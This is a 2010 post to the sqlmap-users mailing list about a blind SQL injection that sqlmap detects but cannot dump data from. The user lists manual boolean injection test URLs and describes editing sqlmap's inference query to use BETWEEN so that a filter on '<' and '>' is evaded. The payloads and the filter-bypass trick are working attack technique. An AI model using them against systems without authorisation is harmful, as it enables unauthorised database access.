[sqlmap-users] blind sql injection problem
Brought to you by:
inquisb
From: velky b. <vel...@gm...> - 2010-02-20 17:38:26
|
Hello, I have found blind SQL injection in the GET parameter of audited MySQL application (also sqlmap is able to identify the injection), but it is not possible to dump any data (like --current-user or --current-db). Only option, which is working is --fingerprint (gives correct result of mySQL 5 version), all other options gave the same result as "None". Because it looked strange to me, I made some basic tests manually with following results: http://localhost/index.php?id=9 AND 1 = 1 ---> TRUE (should be TRUE) http://localhost/index.php?id=9 AND 1 = 0 ---> FALSE (should be FALSE) http://localhost/index.php?id=9 AND 6 > 5 ---> FALSE (should be TRUE) http://localhost/index.php?id=9 AND 6 < 5 ---> FALSE (should be FALSE) http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 5 ---> FALSE http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 10 ---> TRUE As you can see from these results, it looks that characters "<" and ">" are filtered within application. However, injection is still working. I suppose, that sqlmap uses these characters ("<",">") really often during dumping of data from database. So I have changed the following line in mysql section of queries.xml file: original line: <inference query="AND ORD(MID((%s), %d, 1)) > %d"/> updated line: <inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/> Unfortunatelly, the result was same (None). What else should be modified? Is it be possible to use BETWEEN statement instead of ">" in current version of sqlmap? Is it already supported somehow in sqlmap or would it appear in future versions? Thank you in advance vb |